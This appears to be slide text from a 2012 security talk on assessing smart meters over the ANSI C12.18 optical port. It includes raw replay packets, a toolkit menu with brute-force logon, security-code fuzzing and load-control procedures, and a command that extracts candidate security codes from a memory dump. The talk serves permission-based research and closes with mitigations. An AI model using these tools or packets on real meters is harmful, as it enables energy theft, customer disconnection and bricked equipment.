Looking Into The Eye Of The Meter
Don C. Weber (Cutaway), InGuardians, Inc.
http://www.linkedin.com/in/cutaway
http://inguardians.com/info
Copyright 2012 InGuardians, Inc.

Smart Meter Research Findings: REDACTED

Research Disclaimer
• Yes, I conduct assessments on AMI components
• No, I will not tell you for which clients
• No, I will not tell you which vendor products I have analyzed
• Yes, many of these images are generic

Danger: Electrocution
I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions.
Random image taken from: http://www.flickr.com/photos/lwr/132854217/

Permission-based Research / Penetration Testing
Unauthorized testing is illegal, EVEN IF THE METER IS ON YOUR HOUSE.
Getting permission for research IS NOT IMPOSSIBLE. Contact vendors.
I am not responsible for your actions. InGuardians, Inc. is not responsible for your actions.
Agenda
• Purpose
• Smart Meters
• Criminals and Smart Meters
• Attack/Assessment
• Optical Tool
• Mitigations

Purpose: Presentation and Toolkit
• Smart Meter data acquisition techniques have been known since January 5, 2009
  - Advanced Metering Infrastructure Attack Methodology [1]
  - Some vendors/utilities/people/teams are still not aware
• Tools to:
  - Test functionality
  - Validate configuration
  - Generate anomalous data

What Criminals Can Attack
• Access and change data on the meter
• Gain access to wireless communications
• Subvert field hardware to impact internal resources

Criminal Motivations
• Free or Reduced Energy <- HAS ALREADY OCCURRED VIA OPTICAL PORT
• Corporate Espionage
• Access To Back-End Resources
• Non-Kinetic Attack
• Hacktivism

Aggregator On Poletop (photo)

Only One Winks At You (photo)

Where To Start? Steal This?
State of Texas: Class B Misdemeanor Theft ($50 to $500): Jail <180 Days and/or Fine <$2000
Meter near my barber shop. The exposed contacts scared

Components and Interaction (DANGER!!!)
• Data At Rest
  - Microcontrollers
  - Memory
  - Radios
• Data In Motion
  - MCU to Radio
  - MCU to MCU
  - MCU to Memory
  - Board to Board
  - IR to MCU
Image taken from: http://www.ifeitxonVTeardowiVXXXXXXX-Smart-Meter-Teardown/5710/l

Data At Rest
• Serial/Parallel EEPROM (PDIP/SOIJ/SOIC), data over SPI/I2C
  [Pinout diagram: 8-pin EEPROM package showing the VCC, SCL and SDA pins]
• NAND/NOR/NVRAM/SRAM/CellularRAM/PSRAM/SuperFlash/DataFlash (BGA/FBGA/VFBGA)
• Tools: Total Phase Aardvark, Flash Utility

Dumping Memory
• Xeltek SuperPro 5000 plus Adapter
• Custom Extractors

Memory
• Data Storage Standards
  - C12.19 Tables in Transit
    • Standard Tables: formatted and documented
    • Manufacturer Tables: formatted but not externally documented
  - Custom
    • Obfuscated Information and Tables
    • Extended memory for firmware
    • SWAP Space
[Screenshot: special_meter.bin opened in the Okteta hex editor]
ANSI C12.19-2008: American National Standard For Utility Industry End Device Data Tables

Data In Motion
Random image taken from some random Internet site

Data Eavesdropping - Step One
• Persistent tapping by soldering leads to components
• Provides consistent monitoring for research and development

ANSI C12 Communication Protocols
• ANSI C12.18-2006: American National Standard Protocol Specification for ANSI Type 2 Optical Port
  - C12.18 is okay, because you know what you are getting
• ANSI C12.21-2006: American National Standard Protocol Specification for Telephone Modem Communication
  - C12.21 is worse, because people think it is "secure"
• ANSI C12.22-2008: American National Standard Protocol Specification For Interfacing to Data Communication Networks
  - C12.22: the ANSI committee has stated vendors should be implementing this

Logic Analyzer - Async Serial
• Analyzers can decode the digital signal
• Export data to CSV formatted files
• C12.21 Identification Service Response Packet fields: Standard (0x00 == C12.18, 0x02 == C12.21), Version, Revision, End-of-list
C12.18 Packet Basics
C12.21 Identification Service Request Packet, as decoded by the logic analyzer. Packet layout: Start packet character (0xEE) | Identity | Control Field | Sequence Number | Length | Data (Identification Service) | CCITT CRC.

Captured exchange (Value | Direction | Field; the Time [s] column of the export ran from about 70.63 s to 70.80 s and is omitted):

  Value  Direction    Field
  0xEE   Metro-RXD0   stp
  0x00   Metro-RXD0   ident
  0x20   Metro-RXD0   cntl
  0x00   Metro-RXD0   Seq-nbr
  0x00   Metro-RXD0   len0
  0x01   Metro-RXD0   len1
  0x20   Metro-RXD0   identify
  0x82   Metro-RXD0   crc0
  0x70   Metro-RXD0   crc1
  0x06   InG-TXD0     ack
  0xEE   InG-TXD0     stp
  0x00   InG-TXD0     ident
  0x20   InG-TXD0     cntl
  0x00   InG-TXD0     Seq-nbr
  0x00   InG-TXD0     len0
  0x05   InG-TXD0     len1
  0x00   InG-TXD0     ok
  0x00   InG-TXD0     (standard: C12.18)
  0x01   InG-TXD0     (version)
  0x00   InG-TXD0     (revision)
  0x00   InG-TXD0     (end-of-list)
  0xFF   InG-TXD0     crc0
  0x42   InG-TXD0     crc1
  0x06   Metro-RXD0   ack
  0xEE   Metro-RXD0   stp
  0x00   Metro-RXD0   ident
  (unreadable) Metro-RXD0 cntl
  0x00   Metro-RXD0   Seq-nbr
  0x00   Metro-RXD0   len0
  0x05   Metro-RXD0   len1
  0x61   Metro-RXD0   negotiate
  0x01   Metro-RXD0
  0x00   Metro-RXD0

Field abbreviations: stp = start packet character, ident = identity, cntl = control field, Seq-nbr = sequence number, len0/len1 = length, crc0/crc1 = CCITT CRC.
C12.18 Basics: Request/Response Pattern
- Identification
- Negotiation
- Logon
- Security
- Action (Read, Write, Procedure)
- Logoff
- Terminate

CSV Parser Functionality

cutaway> python c12_18_csv_parser.py -h
Usage: c12_18_csv_parser.py -rxd <file> -txd <file> [-h] [-m] [-o <name>]
  -h   -> Enable Help mode
  -rxd -> A CSV file that contains the response portion of data transmission
  -txd -> A CSV file that contains the request portion of data transmission
  -m   -> Generate an output file that is marked according to the ANSI C12.18 standard. This output may fail if the file contains errors
  -o   -> Name of the output files. This will be renamed to contain the date and time to make the file unique. The filename will also be marked with COMBO for a normal combined output and COMBO-MARKED for the file marked according to the ANSI C12.18 standard.

This program is designed to parse CSV data from a Saleae Logic Analyzer. The input files should contain the hex byte output from the Async-Serial analyzer. This data should follow the ANSI C12.18 packet structure. This tool will generate a combined CSV file that has been sorted. If specified, the tool will also mark the bytes according to the ANSI C12.18 standard.

Replay Tables To Talk To Tables
Excerpt from c12_18_packet.py (shown in vim alongside c12_18_fuzz_client.py). Each entry is one complete packet, <stp><identity><ctrl><seq-nbr><len0><len1><data><crc0><crc1>, with the CRC-16 computed over the preceding bytes and sent low byte first:

# Requests
ident = ['\xee\x00\x00\x00\x00\x01\x20\x13\x10', '\xee\x00\x20\x00\x00\x01\x20\x82\x70']
nego = ['\xee\x00\x00\x00\x00\x05\x61\x01\x00\x01\x06\xb8\x25', '\xee\x00\x20\x00\x00\x05\x61\x01\x00\x01\x06\x81\xd2']
logoff = ['\xee\x00\x00\x00\x00\x01\x52\x86\x40', '\xee\x00\x20\x00\x00\x01\x52\x17\x20']

# Responses
ident_r = ['\xee\x00\x00\x00\x00\x05\x00\x00\x01\x00\x00\xc6\xb5', '\xee\x00\x20\x00\x00\x05\x00\x00\x01\x00\x00\xff\x42']
nego_r = ['\xee\x00\x00\x00\x00\x05\x00\x01\x00\x01\x06\x4f\x8f', '\xee\x00\x20\x00\x00\x05\x00\x01\x00\x01\x06\x76\x78']
ok_r = ['\xee\x00\x00\x00\x00\x01\x00\x11\x31', '\xee\x00\x20\x00\x00\x01\x00\x80\x51']
err_r = ['\xee\x00\x00\x00\x00\x01\x01\x98\x20', '\xee\x00\x20\x00\x00\x01\x01\x09\x40']
sns_r = ['\xee\x00\x00\x00\x00\x01\x02\x03\x12', '\xee\x00\x20\x00\x00\x01\x02\x92\x72']
isc_r = ['\xee\x00\x00\x00\x00\x01\x03\x8a\x03', '\xee\x00\x20\x00\x00\x01\x03\x1b\x63']
onp_r = ['\xee\x00\x00\x00\x00\x01\x04\x35\x77', '\xee\x00\x20\x00\x00\x01\x04\xa4\x17']
iar_r = ['\xee\x00\x00\x00\x00\x01\x05\xbc\x66', '\xee\x00\x20\x00\x00\x01\x05\x2d\x06']
bsy_r = ['\xee\x00\x00\x00\x00\x01\x06\x27\x54', '\xee\x00\x20\x00\x00\x01\x06\xb6\x34']
dnr_r = ['\xee\x00\x00\x00\x00\x01\x07\xae\x45', '\xee\x00\x20\x00\x00\x01\x07\x3f\x25']
dlk_r = ['\xee\x00\x00\x00\x00\x01\x08\x59\xbd', '\xee\x00\x20\x00\x00\x01\x08\xc8\xdd']
rno_r = ['\xee\x00\x00\x00\x00\x01\x09\xd0\xac', '\xee\x00\x20\x00\x00\x01\x09\x41\xcc']
isss_r = ['\xee\x00\x00\x00\x00\x01\x0a\x4b\x9e', '\xee\x00\x20\x00\x00\x01\x0a\xda\xfe']

# Wait can be sent as a requestor or a responder
wait = [
    ['\xee\x00\x00\x00\x00\x02\x70\x01\x68\xff', '\xee\x00\x20\x00\x00\x02\x70\x01\x08\x7a'],
    ['\xee\x00\x00\x00\x00\x02\x70\x02\xf3\xcd', '\xee\x00\x20\x00\x00\x02\x70\x02\x93\x48'],
    ['\xee\x00\x00\x00\x00\x02\x70\x03\x7a\xdc', '\xee\x00\x20\x00\x00\x02\x70\x03\x1a\x59'],
    ['\xee\x00\x00\x00\x00\x02\x70\x04\xc5\xa8', '\xee\x00\x20\x00\x00\x02\x70\x04\xa5\x2d'],
]
term = ['\xee\x00\x00\x00\x00\x01\x21\x9a\x01', '\xee\x00\x20\x00\x00\x01\x21\x0b\x61']

# The logon and security packets carry the security code; they are defined
# elsewhere in the file and are not shown on the slide (placeholders here).
logon = [None, None]
security = [None, None]

##########################
# Unknown Sequences
# Two versions are provided to handle different control bytes
# CNTL Byte needs to alternate
logon_req_names = ['Identification', 'Negotiation', 'Logon', 'Security']
logon_req_seq = [[ident[0], nego[1], logon[0], security[1]],
                 [ident[1], nego[0], logon[1], security[0]]]
logon_resp_names = ['ID Response', 'Nego Response', 'OK', 'OK']
logon_resp_seq = [[ident_r[0], nego_r[1], ok_r[0], ok_r[1]],
                  [ident_r[1], nego_r[0], ok_r[1], ok_r[0]]]

Advanced Persistent Tether (photo)

Hardware Client Functionality
• Serial Transmitter (receive possible)
• Replay C12.18 Packets
• C12.19 Table Interaction
  - Read Tables
  - Write Tables
  - Run Procedures
• Receive responses via logic analyzer
• Parse responses by hand

cutaway> python c12_18_hw_client.py -h
Usage: c12_18_hw_client.py [-h] [-D] [-P <seconds>] [-f <file>] [-no] -a <action> [-t <table>] [-d <decade>] [-p <procedure>] [-s <data>] [-lp <list>]
  -h: print help
  -D: turn on debugging statements
  -P <seconds>: start pause in seconds
  -a <action>: perform a specific action:
      test_login
      read_table: requires -t and table number, or defaults to a ...
      read_decade: requires -d and decade number, or defaults to ...
      runproc: requires -p and procedure number, or defaults to ...
  -f <file>: select configuration file
  -t <n>: table number
  -d <n>: decade number
  -p <n>: procedure number
  -s <data>: data for sending
  -lp <list>: comma separated list of procedure numbers
  -no: turn off negotiation attempts
NOTE: This tool is fire and forget. You will need to monitor the hardware lines with a logic analyzer to determine success and failure or to read data.

Wink! Wink! Wink! Wink! (photo)
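The framing described on the Packet Basics slide and used by every entry in the packet list above, as an added example that is not code from the slides or from the OptiGuard toolkit: it builds the Identification request, rebuilds the meter's reply from a constructed two-column capture, checks the CCITT CRC and decodes the Identification response fields. The CRC parameters (CRC-16/X-25, low byte sent first) are an assumption that reproduces the CRC bytes shown on the slide.

```python
"""ANSI C12.18 link-layer framing: build a request, check and decode a reply.

Added example, not code from the slides or from the OptiGuard toolkit.
Packet layout, field names and sample bytes follow the Packet Basics slide;
the CRC parameters (CRC-16/X-25, low byte sent first) are an assumption.
"""

STP = 0xEE   # start-of-packet character
ACK = 0x06   # sent by the receiver after a well-formed packet

# Standard field of the Identification response, as listed on the slide
STANDARDS = {0x00: "C12.18", 0x02: "C12.21"}

# First data byte of every response (abbreviations as in the packet list)
RESPONSE_CODES = {
    0x00: "ok", 0x01: "err (rejected)", 0x02: "sns (service not supported)",
    0x03: "isc (insufficient security clearance)",
    0x04: "onp (operation not possible)", 0x05: "iar (inappropriate action)",
    0x06: "bsy (device busy)", 0x07: "dnr (data not ready)",
    0x08: "dlk (data locked)", 0x09: "rno (renegotiate request)",
    0x0A: "isss (invalid service sequence state)",
}


def crc16_x25(data: bytes) -> int:
    """CCITT CRC as C12.18 uses it: reflected poly 0x8408, init 0xFFFF, final XOR."""
    crc = 0xFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF


def build_packet(data: bytes, ctrl: int = 0x00, identity: int = 0, seq: int = 0) -> bytes:
    """<stp><identity><ctrl><seq-nbr><len0><len1><data><crc0><crc1>.
    ctrl toggles between 0x00 and 0x20 on successive packets, which is why the
    packet list carries two copies of every packet."""
    body = bytes([STP, identity, ctrl, seq]) + len(data).to_bytes(2, "big") + data
    crc = crc16_x25(body)
    return body + bytes([crc & 0xFF, crc >> 8])   # crc0 = low byte, crc1 = high byte


def parse_packet(raw: bytes) -> dict:
    """Split one framed packet into fields; reject bad framing, length or CRC."""
    if len(raw) < 8 or raw[0] != STP:
        raise ValueError("missing start-of-packet character 0xEE")
    length = int.from_bytes(raw[4:6], "big")
    if len(raw) != 6 + length + 2:
        raise ValueError(f"length field says {length} data bytes, frame has {len(raw)}")
    wire_crc = raw[-2] | (raw[-1] << 8)
    calc_crc = crc16_x25(raw[:-2])
    if wire_crc != calc_crc:
        raise ValueError(f"CRC mismatch: wire 0x{wire_crc:04x}, computed 0x{calc_crc:04x}")
    return {"identity": raw[1], "ctrl": raw[2], "seq": raw[3], "data": raw[6:6 + length]}


def decode_ident_response(data: bytes) -> dict:
    """Identification response data: <ok><standard><version><revision>...<end-of-list>."""
    code = RESPONSE_CODES.get(data[0], f"unknown 0x{data[0]:02x}")
    if data[0] != 0x00:
        return {"response": code}          # an error reply carries no identification fields
    return {
        "response": code,
        "standard": STANDARDS.get(data[1], f"unknown 0x{data[1]:02x}"),
        "version": data[2],
        "revision": data[3],
        "end_of_list": data[-1] == 0x00,
    }


def bytes_from_capture(rows) -> bytes:
    """Rebuild the byte stream from 'time,0xNN' rows, i.e. the Time and Value
    columns of the logic analyzer's CSV export shown on the slide."""
    return bytes(int(row.split(",")[1], 16) for row in rows if row.strip())


def read_response(stream: bytes) -> dict:
    """A responder first acks the request with 0x06, then sends its own packet."""
    if not stream or stream[0] != ACK:
        raise ValueError("request was not acknowledged")
    return parse_packet(stream[1:])


# Constructed capture (timestamps invented): the meter's reply to the
# Identification request, byte for byte as in the slide's analyzer table.
CAPTURE = [
    "70.688406,0x06", "70.716352,0xEE", "70.728775,0x00", "70.729818,0x20",
    "70.730860,0x00", "70.731852,0x00", "70.732895,0x05", "70.733937,0x00",
    "70.734980,0x00", "70.736022,0x01", "70.737065,0x00", "70.738107,0x00",
    "70.739150,0xFF", "70.740192,0x42",
]

if __name__ == "__main__":
    req = build_packet(b"\x20", ctrl=0x20)           # Identification request
    print("request :", req.hex(" "))                 # ee 00 20 00 00 01 20 82 70
    resp = read_response(bytes_from_capture(CAPTURE))
    print("response:", decode_ident_response(resp["data"]))
```

Running the same check over a CSV export that fails the CRC or length test is the quickest way to tell a flaky optical transfer from a real meter response.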
Lean In For A Closer Look

ANSI Type 2 Optical Port: Not Your Typical Infra-red Port
• Remote control devices
• Provides /dev/ttyUSB0 via FTDI chip
• Open Source Optical Probe? IguanaWorks, Gainesville, Florida: http://iguanaworks.net/

What Do We Need To Do This?
• Serial Transceiver Driver
• C12.18 Packet Driver
• C12.18 Client
  - Reads and parses C12.19 Tables
  - Writes to C12.19 Tables
  - Runs C12.19 Procedures
  - Easy function updates
  - Easy access to all functions

OptiGuard: A Smart Meter Assessment Toolkit

cutaway> python c12_18_optical_client.py
## C12.18 Optical Client - InGuardians, Inc.
## Please review license and Terms of Use before using this software.
############################################################
Start Time: 00:50:36 12/28/11 CST
##########################################
## 0) Quit
## 1) Test Negotiation Sequence
## 2) Test Logon
## 3) Parse Configuration Table
## 4) Parse General Manufacturer Identification Table
## 5) Read Table
## 6) Read Multiple Tables
## 7) Read Decade
## 8) Run Procedure
## 9) Run Multiple Procedures
## 10) Run Multiple Procedures without login
## 11) Write Table
## 12) Brute Force Logon
## 13) Alternate Brute Force Logon (Read Table Verification)
## 14) Fuzz Security code
## 15) Alternate Fuzz Security code
## 16) Walk User IDs
## 17) Read Single Table walking User IDs
## 18) Read Multiple Table walking User IDs
## 19) Write Table 13 Demand Control Table. Table write Proof of Concept
## 20) Run Procedure 21 Direct Load Control and set 0 percent load
## 21) Run Procedure 21 Direct Load Control and set 100 percent load
## 22) Toggle Debug
## 23) Terminate Session
##########################################
Enter Action Selection:

Menu Notes
- Requires a VALID C12.18 Security Code to modify tables or run procedures
- Currently only works with some meters
- Vendor specific functions may be required
- C12.18 functions are coded for easy implementation and modification
- Optical transfer is finicky, and fuzzing / brute forcing is hit or miss and must be monitored
- Brute force procedure runs have been known to disconnect/connect meters
- Brute force procedure runs have been known to brick meters

Using The Eye Chart

cutaway> python extract_c12_18_seccode.py -b -f special_meter.bin -st 4 -sp 23 > meter_brute_file.txt
cutaway> wc -l meter_brute_file.txt
12277 meter_brute_file.txt
cutaway> head meter_brute_file.txt
0000010000202020202020202020202020202020
0000010020202020202020202020202020202020
0000012000000120202020202020202020202020
00000120000001203C0000202020202020202020
00000120000001203C0020202020202020202020
00000120000001203C2020202020202020202020
0000012000002020202020202020202020202020
0000012000202020202020202020202020202020
0000012020202020202020202020202020202020
0000012022202020202020202020202020202020
cutaway>

Can check one code roughly every 2 seconds: 12277 x 2 seconds = 409 minutes = 6.8 hours.
Hmmm, are failed logons logged? Does the meter return an error after N attempts?

Open Wide for a Deep Look Inside
Random image taken from: http://www.gonemoviesxom/www/Hoo
Mitigations - General
• Residential meters on businesses
  - Evaluate for increased risk to the client
• Limit Shared Security Codes
  - Difficult to implement a single security code per meter
  - Can vary in numerous ways:
    • Vendor
    • Commercial and Residential meter
    • Zip Code

Mitigations - General (2)
• Incident Response Planning
  - Prioritize critical field assets
  - Incident response plan and training
• Employee Training
  - Identify, Report, Respond

Mitigations - Physical
• Tamper Alerts
  - May seem overwhelming, initially
  - Experience will identify correlating data to escalate appropriately
• Toggle Optical Port
  - Use a switch that activates the optical interface
  - Should generate a tamper alert

Mitigations - Data At Rest
• Secure Data Storage
  - Encryption <- must be implemented properly
  - Hashes <- must be implemented properly
• Configuration Integrity Checks
  - Vendor specific
  - Some systems already do this
  - Meters should function with the old configuration until the new one is approved / denied

Mitigations - Data In Motion
• IR Interaction Authorization Tokens
  - Breaking or augmenting the standard?
• Microcontroller to
  - C12.22
  - Obfuscated Protocols

OptiGuard Offspring?
• Wireless Optical Port Readers
  - Small cheap magnetic devices activated wirelessly
• Optical Port Spraying
  - IR interaction without touching the meter
• Wireless Hardware Sniffers/MITM
  - Detect updates and modify data in transit
• Neighborhood Area Network FHSS Eavesdropping
  - Channels, spacing, modulation, sync bytes, etc.

Vendor Participation
• The following people helped out in various important ways during this journey.
  - Ed Beroset, Elster
  - Robert Former, Itron
  - Others who have asked not to be named

Those Who Be Thanked
Gretchen, Garrison, and Collier Weber
Andrew Righter
Atlas
Daniel Thanos
John Sawyer
Joshua Wright
Matt Carpenter
Tom Liston
Travis Goodspeed

InGuardians: consulting@inguardians.com. Tell them Cutaway sent you.
Don C. Weber / Cutaway: don@inguardians.com